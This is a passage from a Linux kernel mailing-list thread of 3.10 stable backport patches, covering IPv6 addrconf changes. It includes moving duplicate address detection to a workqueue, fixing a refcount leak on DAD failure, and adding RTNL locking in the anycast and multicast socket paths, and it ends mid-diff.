 include/net/if_inet6.h |   4 +-
 net/ipv6/addrconf.c    | 186 ++++++++++++++++++++++++++++++++++++-------------
 2 files changed, 141 insertions(+), 49 deletions(-)

diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
index 3b558c6..a49b650 100644
--- a/include/net/if_inet6.h
+++ b/include/net/if_inet6.h
@@ -31,8 +31,10 @@
 #define IF_PREFIX_AUTOCONF	0x02
 
 enum {
+	INET6_IFADDR_STATE_PREDAD,
 	INET6_IFADDR_STATE_DAD,
 	INET6_IFADDR_STATE_POSTDAD,
+	INET6_IFADDR_STATE_ERRDAD,
 	INET6_IFADDR_STATE_UP,
 	INET6_IFADDR_STATE_DEAD,
 };
@@ -58,7 +60,7 @@ struct inet6_ifaddr {
 	unsigned long		cstamp;	/* created timestamp */
 	unsigned long		tstamp; /* updated timestamp */
 
-	struct timer_list	dad_timer;
+	struct delayed_work	dad_work;
 
 	struct inet6_dev	*idev;
 	struct rt6_info		*rt;
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 4ff6a9c..98dd353 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -139,10 +139,12 @@ static int ipv6_count_addresses(struct inet6_dev *idev);
 static struct hlist_head inet6_addr_lst[IN6_ADDR_HSIZE];
 static DEFINE_SPINLOCK(addrconf_hash_lock);
 
-static void addrconf_verify(unsigned long);
+static void addrconf_verify(void);
+static void addrconf_verify_rtnl(void);
+static void addrconf_verify_work(struct work_struct *);
 
-static DEFINE_TIMER(addr_chk_timer, addrconf_verify, 0, 0);
-static DEFINE_SPINLOCK(addrconf_verify_lock);
+static struct workqueue_struct *addrconf_wq;
+static DECLARE_DELAYED_WORK(addr_chk_work, addrconf_verify_work);
 
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp);
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp);
@@ -157,7 +159,7 @@ static struct rt6_info *addrconf_get_prefix_route(const struct in6_addr *pfx,
 						  u32 flags, u32 noflags);
 
 static void addrconf_dad_start(struct inet6_ifaddr *ifp);
-static void addrconf_dad_timer(unsigned long data);
+static void addrconf_dad_work(struct work_struct *w);
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp);
 static void addrconf_dad_run(struct inet6_dev *idev);
 static void addrconf_rs_timer(unsigned long data);
@@ -259,9 +261,9 @@ static void addrconf_del_rs_timer(struct inet6_dev *idev)
 		__in6_dev_put(idev);
 }
 
-static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp)
+static void addrconf_del_dad_work(struct inet6_ifaddr *ifp)
 {
-	if (del_timer(&ifp->dad_timer))
+	if (cancel_delayed_work(&ifp->dad_work))
 		__in6_ifa_put(ifp);
 }
 
@@ -273,12 +275,12 @@ static void addrconf_mod_rs_timer(struct inet6_dev *idev,
 	mod_timer(&idev->rs_timer, jiffies + when);
 }
 
-static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp,
-				   unsigned long when)
+static void addrconf_mod_dad_work(struct inet6_ifaddr *ifp,
+				   unsigned long delay)
 {
-	if (!timer_pending(&ifp->dad_timer))
+	if (!delayed_work_pending(&ifp->dad_work))
 		in6_ifa_hold(ifp);
-	mod_timer(&ifp->dad_timer, jiffies + when);
+	mod_delayed_work(addrconf_wq, &ifp->dad_work, delay);
 }
 
 static int snmp6_alloc_dev(struct inet6_dev *idev)
@@ -773,8 +775,9 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp)
 
 	in6_dev_put(ifp->idev);
 
-	if (del_timer(&ifp->dad_timer))
-		pr_notice("Timer is still running, when freeing ifa=%p\n", ifp);
+	if (cancel_delayed_work(&ifp->dad_work))
+		pr_notice("delayed DAD work was pending while freeing ifa=%p\n",
+			  ifp);
 
 	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
 		pr_warn("Freeing alive inet6 address %p\n", ifp);
@@ -866,8 +869,7 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen,
 
 	spin_lock_init(&ifa->lock);
 	spin_lock_init(&ifa->state_lock);
-	setup_timer(&ifa->dad_timer, addrconf_dad_timer,
-		    (unsigned long)ifa);
+	INIT_DELAYED_WORK(&ifa->dad_work, addrconf_dad_work);
 	INIT_HLIST_NODE(&ifa->addr_lst);
 	ifa->scope = scope;
 	ifa->prefix_len = pfxlen;
@@ -927,6 +929,8 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	int deleted = 0, onlink = 0;
 	unsigned long expires = jiffies;
 
+	ASSERT_RTNL();
+
 	spin_lock_bh(&ifp->state_lock);
 	state = ifp->state;
 	ifp->state = INET6_IFADDR_STATE_DEAD;
@@ -991,7 +995,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	}
 	write_unlock_bh(&idev->lock);
 
-	addrconf_del_dad_timer(ifp);
+	addrconf_del_dad_work(ifp);
 
 	ipv6_ifa_notify(RTM_DELADDR, ifp);
 
@@ -1614,7 +1618,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 {
 	if (ifp->flags&IFA_F_PERMANENT) {
 		spin_lock_bh(&ifp->lock);
-		addrconf_del_dad_timer(ifp);
+		addrconf_del_dad_work(ifp);
 		ifp->flags |= IFA_F_TENTATIVE;
 		if (dad_failed)
 			ifp->flags |= IFA_F_DADFAILED;
@@ -1637,20 +1641,21 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 		}
 		ipv6_del_addr(ifp);
 #endif
-	} else
+	} else {
 		ipv6_del_addr(ifp);
+	}
 }
 
 static int addrconf_dad_end(struct inet6_ifaddr *ifp)
 {
 	int err = -ENOENT;
 
-	spin_lock(&ifp->state_lock);
+	spin_lock_bh(&ifp->state_lock);
 	if (ifp->state == INET6_IFADDR_STATE_DAD) {
 		ifp->state = INET6_IFADDR_STATE_POSTDAD;
 		err = 0;
 	}
-	spin_unlock(&ifp->state_lock);
+	spin_unlock_bh(&ifp->state_lock);
 
 	return err;
 }
@@ -1683,7 +1688,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 		}
 	}
 
-	addrconf_dad_stop(ifp, 1);
+	spin_lock_bh(&ifp->state_lock);
+	/* transition from _POSTDAD to _ERRDAD */
+	ifp->state = INET6_IFADDR_STATE_ERRDAD;
+	spin_unlock_bh(&ifp->state_lock);
+
+	addrconf_mod_dad_work(ifp, 0);
 }
 
 /* Join to solicited addr multicast group. */
@@ -1692,6 +1702,8 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
+	ASSERT_RTNL();
+
 	if (dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1703,6 +1715,8 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
+	ASSERT_RTNL();
+
 	if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1713,6 +1727,9 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
+
+	ASSERT_RTNL();
+
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -1724,6 +1741,9 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
+
+	ASSERT_RTNL();
+
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -2358,7 +2378,7 @@ ok:
 			}
 #endif
 			in6_ifa_put(ifp);
-			addrconf_verify(0);
+			addrconf_verify();
 		}
 	}
 	inet6_prefix_notify(RTM_NEWPREFIX, in6_dev, pinfo);
@@ -2501,7 +2521,7 @@ static int inet6_addr_add(struct net *net, int ifindex, const struct in6_addr *p
 		 */
 		addrconf_dad_start(ifp);
 		in6_ifa_put(ifp);
-		addrconf_verify(0);
+		addrconf_verify_rtnl();
 		return 0;
 	}
 
@@ -3082,7 +3102,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 		hlist_for_each_entry_rcu(ifa, h, addr_lst) {
 			if (ifa->idev == idev) {
 				hlist_del_init_rcu(&ifa->addr_lst);
-				addrconf_del_dad_timer(ifa);
+				addrconf_del_dad_work(ifa);
 				goto restart;
 			}
 		}
@@ -3122,7 +3142,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 	while (!list_empty(&idev->addr_list)) {
 		ifa = list_first_entry(&idev->addr_list,
 				       struct inet6_ifaddr, if_list);
-		addrconf_del_dad_timer(ifa);
+		addrconf_del_dad_work(ifa);
 
 		list_del(&ifa->if_list);
 
@@ -3217,10 +3237,10 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp)
 		rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1);
 
 	ifp->dad_probes = idev->cnf.dad_transmits;
-	addrconf_mod_dad_timer(ifp, rand_num);
+	addrconf_mod_dad_work(ifp, rand_num);
 }
 
-static void addrconf_dad_start(struct inet6_ifaddr *ifp)
+static void addrconf_dad_begin(struct inet6_ifaddr *ifp)
 {
 	struct inet6_dev *idev = ifp->idev;
 	struct net_device *dev = idev->dev;
@@ -3272,25 +3292,68 @@ out:
 	read_unlock_bh(&idev->lock);
 }
 
-static void addrconf_dad_timer(unsigned long data)
+static void addrconf_dad_start(struct inet6_ifaddr *ifp)
+{
+	bool begin_dad = false;
+
+	spin_lock_bh(&ifp->state_lock);
+	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
+		ifp->state = INET6_IFADDR_STATE_PREDAD;
+		begin_dad = true;
+	}
+	spin_unlock_bh(&ifp->state_lock);
+
+	if (begin_dad)
+		addrconf_mod_dad_work(ifp, 0);
+}
+
+static void addrconf_dad_work(struct work_struct *w)
 {
-	struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data;
+	struct inet6_ifaddr *ifp = container_of(to_delayed_work(w),
+						struct inet6_ifaddr,
+						dad_work);
 	struct inet6_dev *idev = ifp->idev;
 	struct in6_addr mcaddr;
 
+	enum {
+		DAD_PROCESS,
+		DAD_BEGIN,
+		DAD_ABORT,
+	} action = DAD_PROCESS;
+
+	rtnl_lock();
+
+	spin_lock_bh(&ifp->state_lock);
+	if (ifp->state == INET6_IFADDR_STATE_PREDAD) {
+		action = DAD_BEGIN;
+		ifp->state = INET6_IFADDR_STATE_DAD;
+	} else if (ifp->state == INET6_IFADDR_STATE_ERRDAD) {
+		action = DAD_ABORT;
+		ifp->state = INET6_IFADDR_STATE_POSTDAD;
+	}
+	spin_unlock_bh(&ifp->state_lock);
+
+	if (action == DAD_BEGIN) {
+		addrconf_dad_begin(ifp);
+		goto out;
+	} else if (action == DAD_ABORT) {
+		addrconf_dad_stop(ifp, 1);
+		goto out;
+	}
+
 	if (!ifp->dad_probes && addrconf_dad_end(ifp))
 		goto out;
 
-	write_lock(&idev->lock);
+	write_lock_bh(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY)) {
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 		goto out;
 	}
 
 	spin_lock(&ifp->lock);
 	if (ifp->state == INET6_IFADDR_STATE_DEAD) {
 		spin_unlock(&ifp->lock);
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 		goto out;
 	}
 
@@ -3301,7 +3364,7 @@ static void addrconf_dad_timer(unsigned long data)
 
 		ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED);
 		spin_unlock(&ifp->lock);
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 
 		addrconf_dad_completed(ifp);
 
@@ -3309,15 +3372,16 @@ static void addrconf_dad_timer(unsigned long data)
 	}
 
 	ifp->dad_probes--;
-	addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time);
+	addrconf_mod_dad_work(ifp, ifp->idev->nd_parms->retrans_time);
 	spin_unlock(&ifp->lock);
-	write_unlock(&idev->lock);
+	write_unlock_bh(&idev->lock);
 
 	/* send a neighbour solicitation for our addr */
 	addrconf_addr_solict_mult(&ifp->addr, &mcaddr);
 	ndisc_send_ns(ifp->idev->dev, NULL, &ifp->addr, &mcaddr, &in6addr_any);
 out:
 	in6_ifa_put(ifp);
+	rtnl_unlock();
 }
 
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
@@ -3325,7 +3389,7 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 	struct net_device *dev = ifp->idev->dev;
 	struct in6_addr lladdr;
 
-	addrconf_del_dad_timer(ifp);
+	addrconf_del_dad_work(ifp);
 
 	/*
 	 *	Configure the address for reception. Now it is valid.
@@ -3557,23 +3621,23 @@ int ipv6_chk_home_addr(struct net *net, const struct in6_addr *addr)
  *	Periodic address status verification
  */
 
-static void addrconf_verify(unsigned long foo)
+static void addrconf_verify_rtnl(void)
 {
 	unsigned long now, next, next_sec, next_sched;
 	struct inet6_ifaddr *ifp;
 	int i;
 
+	ASSERT_RTNL();
+
 	rcu_read_lock_bh();
-	spin_lock(&addrconf_verify_lock);
 	now = jiffies;
 	next = round_jiffies_up(now + ADDR_CHECK_FREQUENCY);
 
-	del_timer(&addr_chk_timer);
+	cancel_delayed_work(&addr_chk_work);
 
 	for (i = 0; i < IN6_ADDR_HSIZE; i++) {
 restart:
-		hlist_for_each_entry_rcu_bh(ifp,
-					 &inet6_addr_lst[i], addr_lst) {
+		hlist_for_each_entry_rcu_bh(ifp, &inet6_addr_lst[i], addr_lst) {
 			unsigned long age;
 
 			if (ifp->flags & IFA_F_PERMANENT)
@@ -3664,13 +3728,22 @@ restart:
 
 	ADBG((KERN_DEBUG "now = %lu, schedule = %lu, rounded schedule = %lu => %lu\n",
 	      now, next, next_sec, next_sched));
-
-	addr_chk_timer.expires = next_sched;
-	add_timer(&addr_chk_timer);
-	spin_unlock(&addrconf_verify_lock);
+	mod_delayed_work(addrconf_wq, &addr_chk_work, next_sched - now);
 	rcu_read_unlock_bh();
 }
 
+static void addrconf_verify_work(struct work_struct *w)
+{
+	rtnl_lock();
+	addrconf_verify_rtnl();
+	rtnl_unlock();
+}
+
+static void addrconf_verify(void)
+{
+	mod_delayed_work(addrconf_wq, &addr_chk_work, 0);
+}
+
 static struct in6_addr *extract_addr(struct nlattr *addr, struct nlattr *local)
 {
 	struct in6_addr *pfx = NULL;
@@ -3722,6 +3795,8 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags,
 	clock_t expires;
 	unsigned long timeout;
 
+	ASSERT_RTNL();
+
 	if (!valid_lft || (prefered_lft > valid_lft))
 		return -EINVAL;
 
@@ -3755,7 +3830,7 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags,
 
 	addrconf_prefix_route(&ifp->addr, ifp->prefix_len, ifp->idev->dev,
 			      expires, flags);
-	addrconf_verify(0);
+	addrconf_verify_rtnl();
 
 	return 0;
 }
@@ -4364,6 +4439,8 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token)
 	bool update_rs = false;
 	struct in6_addr ll_addr;
 
+	ASSERT_RTNL();
+
 	if (token == NULL)
 		return -EINVAL;
 	if (ipv6_addr_any(token))
@@ -4409,6 +4486,7 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token)
 	}
 
 	write_unlock_bh(&idev->lock);
+	addrconf_verify_rtnl();
 	return 0;
 }
 
@@ -4610,6 +4688,9 @@ static void __ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp)
 {
 	struct net *net = dev_net(ifp->idev->dev);
 
+	if (event)
+		ASSERT_RTNL();
+
 	inet6_ifa_notify(event ? : RTM_NEWADDR, ifp);
 
 	switch (event) {
@@ -5138,6 +5219,12 @@ int __init addrconf_init(void)
 	if (err < 0)
 		goto out_addrlabel;
 
+	addrconf_wq = create_workqueue("ipv6_addrconf");
+	if (!addrconf_wq) {
+		err = -ENOMEM;
+		goto out_nowq;
+	}
+
 	/* The addrconf netdev notifier requires that loopback_dev
 	 * has it's ipv6 private information allocated and setup
 	 * before it can bring up and give link-local addresses
@@ -5168,7 +5255,7 @@ int __init addrconf_init(void)
 
 	register_netdevice_notifier(&ipv6_dev_notf);
 
-	addrconf_verify(0);
+	addrconf_verify();
 
 	err = rtnl_af_register(&inet6_ops);
 	if (err < 0)
@@ -5199,6 +5286,8 @@ errout:
 errout_af:
 	unregister_netdevice_notifier(&ipv6_dev_notf);
 errlo:
+	destroy_workqueue(addrconf_wq);
+out_nowq:
 	unregister_pernet_subsys(&addrconf_ops);
 out_addrlabel:
 	ipv6_addr_label_cleanup();
@@ -5234,7 +5323,8 @@ void addrconf_cleanup(void)
 	for (i = 0; i < IN6_ADDR_HSIZE; i++)
 		WARN_ON(!hlist_empty(&inet6_addr_lst[i]));
 	spin_unlock_bh(&addrconf_hash_lock);
-
-	del_timer(&addr_chk_timer);
+	cancel_delayed_work(&addr_chk_work);
 	rtnl_unlock();
+
+	destroy_workqueue(addrconf_wq);
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (120 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
                   ` (96 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Wei Yongjun, David S . Miller, Mike Manning, Willy Tarreau

From: Wei Yongjun <weiyongjun1@huawei.com>

commit 751eb6b6042a596b0080967c1a529a9fe98dac1d upstream.

In general, when DAD detected IPv6 duplicate address, ifp->state
will be set to INET6_IFADDR_STATE_ERRDAD and DAD is stopped by a
delayed work, the call tree should be like this:

ndisc_recv_ns
  -> addrconf_dad_failure        <- missing ifp put
     -> addrconf_mod_dad_work
       -> schedule addrconf_dad_work()
         -> addrconf_dad_stop()  <- missing ifp hold before call it

addrconf_dad_failure() called with ifp refcont holding but not put.
addrconf_dad_work() call addrconf_dad_stop() without extra holding
refcount. This will not cause any issue normally.

But the race between addrconf_dad_failure() and addrconf_dad_work()
may cause ifp refcount leak and netdevice can not be unregister,
dmesg show the following messages:

IPv6: eth0: IPv6 duplicate address fe80::XX:XXXX:XXXX:XX detected!
...
unregister_netdevice: waiting for eth0 to become free. Usage count = 1

Cc: stable@vger.kernel.org
Fixes: c15b1ccadb32 ("ipv6: move DAD and addrconf_verify processing
to workqueue")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 98dd353..0f18d858 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1694,6 +1694,7 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 	spin_unlock_bh(&ifp->state_lock);
 
 	addrconf_mod_dad_work(ifp, 0);
+	in6_ifa_put(ifp);
 }
 
 /* Join to solicited addr multicast group. */
@@ -3337,6 +3338,7 @@ static void addrconf_dad_work(struct work_struct *w)
 		addrconf_dad_begin(ifp);
 		goto out;
 	} else if (action == DAD_ABORT) {
+		in6_ifa_hold(ifp);
 		addrconf_dad_stop(ifp, 1);
 		goto out;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (121 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
                   ` (95 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sabrina Dubroca, Cong Wang, David S . Miller, Mike Manning,
	Willy Tarreau

From: Sabrina Dubroca <sd@queasysnail.net>

commit a9ed4a2986e13011fcf4ed2d1a1647c53112f55b upstream.

Calling setsockopt with IPV6_JOIN_ANYCAST or IPV6_LEAVE_ANYCAST
triggers the assertion in addrconf_join_solict()/addrconf_leave_solict()

ipv6_sock_ac_join(), ipv6_sock_ac_drop(), ipv6_sock_ac_close() need to
take RTNL before calling ipv6_dev_ac_inc/dec. Same thing with
ipv6_sock_mc_join(), ipv6_sock_mc_drop(), ipv6_sock_mc_close() before
calling ipv6_dev_mc_inc/dec.

This patch moves ASSERT_RTNL() up a level in the call stack.

Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reported-by: Tommi Rantala <tt.rantala@gmail.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Cc: <stable@vger.kernel.org> 
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved minor conflicts in addrconf.c]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 15 +++++----------
 net/ipv6/anycast.c  | 12 ++++++++++++
 net/ipv6/mcast.c    | 14 ++++++++++++++
 3 files changed, 31 insertions(+), 10 deletions(-)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 0f18d858..3bfd8a5 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1697,14 +1697,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 	in6_ifa_put(ifp);
 }
 
-/* Join to solicited addr multicast group. */
-
+/* Join to solicited addr multicast group.
+ * caller must hold RTNL */
 void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
-	ASSERT_RTNL();
-
 	if (dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1712,12 +1710,11 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 	ipv6_dev_mc_inc(dev, &maddr);
 }
 
+/* caller must hold RTNL */
 void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
-	ASSERT_RTNL();
-
 	if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1725,12 +1722,11 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 	__ipv6_dev_mc_dec(idev, &maddr);
 }
 
+/* caller must hold RTNL */
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
 
-	ASSERT_RTNL();
-
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -1739,12 +1735,11 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 	ipv6_dev_ac_inc(ifp->idev->dev, &addr);
 }
 
+/* caller must hold RTNL */
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
 
-	ASSERT_RTNL();
-
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
diff --git a/net/ipv6/anycast.c b/net/ipv6/anycast.c
index 5a80f15..c59083c 100644
--- a/net/ipv6/anycast.c
+++ b/net/ipv6/anycast.c
@@ -77,6 +77,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	pac->acl_next = NULL;
 	pac->acl_addr = *addr;
 
+	rtnl_lock();
 	rcu_read_lock();
 	if (ifindex == 0) {
 		struct rt6_info *rt;
@@ -137,6 +138,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 error:
 	rcu_read_unlock();
+	rtnl_unlock();
 	if (pac)
 		sock_kfree_s(sk, pac, sizeof(*pac));
 	return err;
@@ -171,13 +173,17 @@ int ipv6_sock_ac_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	spin_unlock_bh(&ipv6_sk_ac_lock);
 
+	rtnl_lock();
 	rcu_read_lock();
 	dev = dev_get_by_index_rcu(net, pac->acl_ifindex);
 	if (dev)
 		ipv6_dev_ac_dec(dev, &pac->acl_addr);
 	rcu_read_unlock();
+	rtnl_unlock();
 
 	sock_kfree_s(sk, pac, sizeof(*pac));
+	if (!dev)
+		return -ENODEV;
 	return 0;
 }
 
@@ -198,6 +204,7 @@ void ipv6_sock_ac_close(struct sock *sk)
 	spin_unlock_bh(&ipv6_sk_ac_lock);
 
 	prev_index = 0;
+	rtnl_lock();
 	rcu_read_lock();
 	while (pac) {
 		struct ipv6_ac_socklist *next = pac->acl_next;
@@ -212,6 +219,7 @@ void ipv6_sock_ac_close(struct sock *sk)
 		pac = next;
 	}
 	rcu_read_unlock();
+	rtnl_unlock();
 }
 
 static void aca_put(struct ifacaddr6 *ac)
@@ -233,6 +241,8 @@ int ipv6_dev_ac_inc(struct net_device *dev, const struct in6_addr *addr)
 	struct rt6_info *rt;
 	int err;
 
+	ASSERT_RTNL();
+
 	idev = in6_dev_get(dev);
 
 	if (idev == NULL)
@@ -302,6 +312,8 @@ int __ipv6_dev_ac_dec(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct ifacaddr6 *aca, *prev_aca;
 
+	ASSERT_RTNL();
+
 	write_lock_bh(&idev->lock);
 	prev_aca = NULL;
 	for (aca = idev->ac_list; aca; aca = aca->aca_next) {
diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
index 7ba6180..cf16eb4 100644
--- a/net/ipv6/mcast.c
+++ b/net/ipv6/mcast.c
@@ -157,6 +157,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	mc_lst->next = NULL;
 	mc_lst->addr = *addr;
 
+	rtnl_lock();
 	rcu_read_lock();
 	if (ifindex == 0) {
 		struct rt6_info *rt;
@@ -170,6 +171,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	if (dev == NULL) {
 		rcu_read_unlock();
+		rtnl_unlock();
 		sock_kfree_s(sk, mc_lst, sizeof(*mc_lst));
 		return -ENODEV;
 	}
@@ -187,6 +189,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	if (err) {
 		rcu_read_unlock();
+		rtnl_unlock();
 		sock_kfree_s(sk, mc_lst, sizeof(*mc_lst));
 		return err;
 	}
@@ -197,6 +200,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	spin_unlock(&ipv6_sk_mc_lock);
 
 	rcu_read_unlock();
+	rtnl_unlock();
 
 	return 0;
 }
@@ -214,6 +218,7 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	if (!ipv6_addr_is_multicast(addr))
 		return -EINVAL;
 
+	rtnl_lock();
 	spin_lock(&ipv6_sk_mc_lock);
 	for (lnk = &np->ipv6_mc_list;
 	     (mc_lst = rcu_dereference_protected(*lnk,
@@ -237,12 +242,15 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 			} else
 				(void) ip6_mc_leave_src(sk, mc_lst, NULL);
 			rcu_read_unlock();
+			rtnl_unlock();
+
 			atomic_sub(sizeof(*mc_lst), &sk->sk_omem_alloc);
 			kfree_rcu(mc_lst, rcu);
 			return 0;
 		}
 	}
 	spin_unlock(&ipv6_sk_mc_lock);
+	rtnl_unlock();
 
 	return -EADDRNOTAVAIL;
 }
@@ -287,6 +295,7 @@ void ipv6_sock_mc_close(struct sock *sk)
 	if (!rcu_access_pointer(np->ipv6_mc_list))
 		return;
 
+	rtnl_lock();
 	spin_lock(&ipv6_sk_mc_lock);
 	while ((mc_lst = rcu_dereference_protected(np->ipv6_mc_list,
 				lockdep_is_held(&ipv6_sk_mc_lock))) != NULL) {
@@ -313,6 +322,7 @@ void ipv6_sock_mc_close(struct sock *sk)
 		spin_lock(&ipv6_sk_mc_lock);
 	}
 	spin_unlock(&ipv6_sk_mc_lock);
+	rtnl_unlock();
 }
 
 int ip6_mc_source(int add, int omode, struct sock *sk,
@@ -830,6 +840,8 @@ int ipv6_dev_mc_inc(struct net_device *dev, const struct in6_addr *addr)
 	struct ifmcaddr6 *mc;
 	struct inet6_dev *idev;
 
+	ASSERT_RTNL();
+
 	/* we need to take a reference on idev */
